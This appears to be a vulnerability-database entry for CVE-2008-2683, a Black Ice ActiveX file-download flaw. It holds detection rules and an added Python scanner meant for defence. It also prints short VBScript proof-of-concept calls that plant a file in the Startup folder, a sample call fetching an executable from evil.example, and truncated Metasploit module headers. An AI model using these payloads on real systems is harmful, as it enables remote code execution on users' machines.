CVE-2008-2683
Published: 2008-06-12
Priority: P351 · Severity: critical · CVSS 2.0: 9.3 (vector AV:N/AC:M/Au:N/C:C/I:C/A:C) · Public exploit available
EPSS: 34.76% (98.2th percentile)
The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument. NOTE: some of these details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| black_ice | barcode_sdk | — | — |
Detection & IOCs (extracted from sources)
- Detect ActiveX instantiation of BIDIB.BIDIBCtrl.1 (CLSID {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}) or BIImgFrm.ocx (CLSID {79956462-F148-497F-B247-DF35A095F80B}) in browser script, particularly calls to the DownloadImageFileURL method with two arguments (remote URL + local file path).
- Alert on files written to C:\WINDOWS\system32\wbem\mof\ by a browser process: the Metasploit module drops a MOF file there so that the WMI service compiles it and executes the previously downloaded payload.
- Alert on executable files written to the Startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\) by a browser or ActiveX process, the persistence technique used in the Cover Page SDK exploit variant.
- Monitor for the 'migrate -f' post-exploitation command triggered via InitialAutoRunScript in Metasploit sessions originating from browser exploitation of this ActiveX control.
- The BIDIB.ocx control is marked 'Safe for Script' and 'Safe for Init' through registry keys and does not implement IObjectSafety, so Internet Explorer will instantiate and script it from any web page without prompting unless a kill bit is set for its CLSID. Audit the safe-for-scripting/safe-for-initialization category keys and the ActiveX Compatibility kill-bit flags for the vulnerable CLSIDs.
- The Metasploit Cover Page SDK module (exploit/windows/browser/blackice_downloadimagefileurl) targets BIImgFrm.ocx 12.0.0.0 (CLSID 79956462-F148-497F-B247-DF35A095F80B) as its primary target, while the original CVE references BIDIB.ocx 10.9.3.0 (CLSID D2797899-BE27-4CDB-892F-4FDC26EA9BA9); both share the same vulnerable method.
- The WMI MOF-based code execution technique used by the Metasploit module only works on Windows versions before Vista.
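The checks in the list above, expressed as runnable Python so they can be dropped into a content scanner or a telemetry pipeline. This is an added example, not code from the page's sources, the vendor, or the Metasploit modules. It covers three of the rules: a scan of page/script text for the two Black Ice CLSIDs or the BIDIB.BIDIBCtrl.1 ProgID together with a two-argument DownloadImageFileURL call (both the JScript and VBScript call forms), a rule over file-create events for browser-originated writes into the WMI MOF autorun directory or the all-users Startup folder, and a classifier for the registry state of one CLSID. The Safe-for-Scripting and Safe-for-Initialization category GUIDs and the 0x400 kill-bit flag are Microsoft's documented values; the sample page, the event list, the process name list and the executable-extension list are constructed assumptions, and reading the live registry with winreg is left to the caller so the logic runs on any platform.

```python
import re

# CLSIDs and ProgID of the two affected controls, as named in the IOC list.
BLACKICE_CLSIDS = {
    "D2797899-BE27-4CDB-892F-4FDC26EA9BA9": "BIDIB.BIDIBCtrl.1 (BIDIB.ocx)",
    "79956462-F148-497F-B247-DF35A095F80B": "BIImgFrm.ocx",
}
# Component-category GUIDs IE checks before scripting a control, and the
# ActiveX Compatibility kill-bit flag (Microsoft-documented values).
CATID_SAFE_FOR_SCRIPTING = "7DD95801-9882-11CF-9FA9-00AA006C42C4"
CATID_SAFE_FOR_INIT = "7DD95802-9882-11CF-9FA9-00AA006C42C4"
KILL_BIT = 0x400

BROWSER_PROCESSES = {"iexplore.exe"}   # assumption: IE is the only ActiveX host of interest
EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs", ".pif")  # assumption

_GUID_RE = re.compile(r"\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
_PROGID_RE = re.compile(r"BIDIB\.BIDIBCtrl\.1", re.I)
# Two-argument call in JScript form  x.DownloadImageFileURL("u", "p")  or in
# VBScript form  x.DownloadImageFileURL "u", "p"  /  x.DownloadImageFileURL a, b
_CALL_RE = re.compile(
    r'\.DownloadImageFileURL\s*\(?\s*("[^"]*"|\w+)\s*,\s*("[^"]*"|\w+)', re.I)


def scan_page(text):
    """Content rule: a page that loads a Black Ice control (by CLSID or
    ProgID) and calls DownloadImageFileURL with two arguments is suspicious."""
    clsids = [m.group(1).upper() for m in _GUID_RE.finditer(text)
              if m.group(1).upper() in BLACKICE_CLSIDS]
    progid = bool(_PROGID_RE.search(text))
    calls = [(src.strip('"'), dst.strip('"')) for src, dst in _CALL_RE.findall(text)]
    return {"clsids": clsids, "progid": progid, "calls": calls,
            "suspicious": bool(calls) and (bool(clsids) or progid)}


def flag_file_writes(events):
    """Endpoint rules: a browser process creating any file under the WMI MOF
    autorun directory, or an executable in the all-users Startup folder.
    Each event is a dict with 'process' and 'path'."""
    hits = []
    for ev in events:
        if ev["process"].lower() not in BROWSER_PROCESSES:
            continue
        path = ev["path"].lower().replace("/", "\\")
        if "\\system32\\wbem\\mof\\" in path:
            hits.append((ev["path"], "MOF dropped by browser (WMI will compile and run it)"))
        elif "\\start menu\\programs\\startup\\" in path and path.endswith(EXECUTABLE_EXTS):
            hits.append((ev["path"], "executable dropped in Startup folder by browser"))
    return hits


def control_exposure(categories, compat_flags=None):
    """Registry rule for one CLSID: 'categories' are the subkey names under
    HKCR\\CLSID\\{clsid}\\Implemented Categories; 'compat_flags' is the
    Compatibility Flags DWORD under HKLM\\SOFTWARE\\Microsoft\\Internet
    Explorer\\ActiveX Compatibility\\{clsid} (None when the key is absent).
    On Windows read both with winreg; they are passed in here so the logic runs anywhere."""
    cats = {c.upper().strip("{}") for c in categories}
    safe_script = CATID_SAFE_FOR_SCRIPTING in cats
    safe_init = CATID_SAFE_FOR_INIT in cats
    killed = compat_flags is not None and (compat_flags & KILL_BIT) == KILL_BIT
    return {"safe_for_script": safe_script, "safe_for_init": safe_init, "kill_bit": killed,
            # IE scripts a 'safe' control from any site without a prompt;
            # only the kill bit blocks it outright.
            "scriptable_from_web": (safe_script or safe_init) and not killed}


# Constructed samples (not captured traffic or real telemetry).
SAMPLE_PAGE_VBS = r'''
<object id="target" classid="clsid:{79956462-F148-497F-B247-DF35A095F80B}"></object>
<script language="vbscript">
arg1="http://www.example.com/robots.txt"
arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt"
target.DownloadImageFileURL arg1 ,arg2
</script>'''
SAMPLE_PAGE_JS = (r'<object id="x" classid="clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9"></object>'
                  r'<script>x.DownloadImageFileURL("http://evil.example/p.exe", "C:\\p.exe");</script>')
SAMPLE_EVENTS = [
    {"process": "iexplore.exe", "path": r"C:\WINDOWS\system32\wbem\mof\svc.mof"},
    {"process": "iexplore.exe",
     "path": r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.exe"},
    {"process": "iexplore.exe",
     "path": r"C:\Documents and Settings\user\Local Settings\Temporary Internet Files\a.jpg"},
    {"process": "wmiprvse.exe", "path": r"C:\WINDOWS\system32\wbem\mof\good\legit.mof"},
]

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE_VBS))
    for path, why in flag_file_writes(SAMPLE_EVENTS):
        print("ALERT:", why, "->", path)
    # Registry state shinnai's advisory reports for BIDIB.ocx: safe for script
    # and init, no IObjectSafety, and no kill bit at the time.
    print(control_exposure([CATID_SAFE_FOR_SCRIPTING, CATID_SAFE_FOR_INIT]))
```

The content rule deliberately requires both the control and the call: an `<object>` tag alone is how any legitimate page using the SDK looks, while the two-argument call with a local path as its second argument is the abuse pattern. The fourth event in the sample (a MOF written by wmiprvse.exe) is not flagged, which is the point of keying the rule on the writing process rather than on the directory alone.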
No detection rules found.
Exploit-DB: Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit) (exploitdb, 2011-06-21, CVE-2008-2683)
---
```ruby
##
# $Id: blackice_downloadimagefileurl.rb 12992 2011-06-21 02:51:39Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  # Browser Autopwn metadata: IE on Windows, JavaScript required, no vuln test.
  autopwn_info({
    :os_name    => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank       => NormalRanking,
    :vuln_test  => nil,
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',
      'Description' => %q{
        This module allows remote attackers to place arbitrary files on a users file system
        by abusing the "
```
(excerpt truncated)
Exploit-DB: Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit) (exploitdb, 2011-06-20, CVE-2008-2683)
---
Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit

```vbscript
' 'target' is the <object> element that instantiates the BIImgFrm.ocx control
' (CLSID {79956462-F148-497F-B247-DF35A095F80B}). The method fetches any remote
' URL and writes it to the caller-chosen local path with no validation, so a
' file lands in the all-users Startup folder and runs at the next logon.
arg1="http://www.google.com/robots.txt"
arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt"
target.DownloadImageFileURL arg1 ,arg2
```

MSF Module

```ruby
##
# $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  # Browser Autopwn metadata: IE on Windows, JavaScript required.
  autopwn_info({
    :os_name    => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank       => NormalRanking,
    :vuln_test  => n
```
(excerpt truncated)
Exploit-DB: Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities (exploitdb, 2008-06-05, CVE-2008-2684)
---
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
and Memory Corruption

url: http://www.blackice.com
File : BIDIB.ocx
Ver. : 10.9.3.0
CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
Mark.: RegKey Safe for Script: True
       RegKey Safe for Init: True
       Implements IObjectSafety: False

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.

Windows XP Professional SP3 fully patched, with Internet Explorer 7
Windows 2k Professional SP3 fully patched, with Internet Explorer 6

In memory of rgod

```vbscript
Sub tryMe
  test.DownloadImageFileURL "http://somesite.com/seed
```
(excerpt truncated)
Metasploit: Black Ice Cover Page ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a user's file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code execution is achieved by first uploading the payload to the remote machine and then uploading a .mof file, which causes the Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. A similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/30548
- http://securityreason.com/securityalert/8276
- http://securityreason.com/securityalert/8277
- http://www.exploit-db.com/exploits/17415
- http://www.osvdb.org/46007
- http://www.vupen.com/english/advisories/2008/1768/references
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42891
- https://www.exploit-db.com/exploits/5750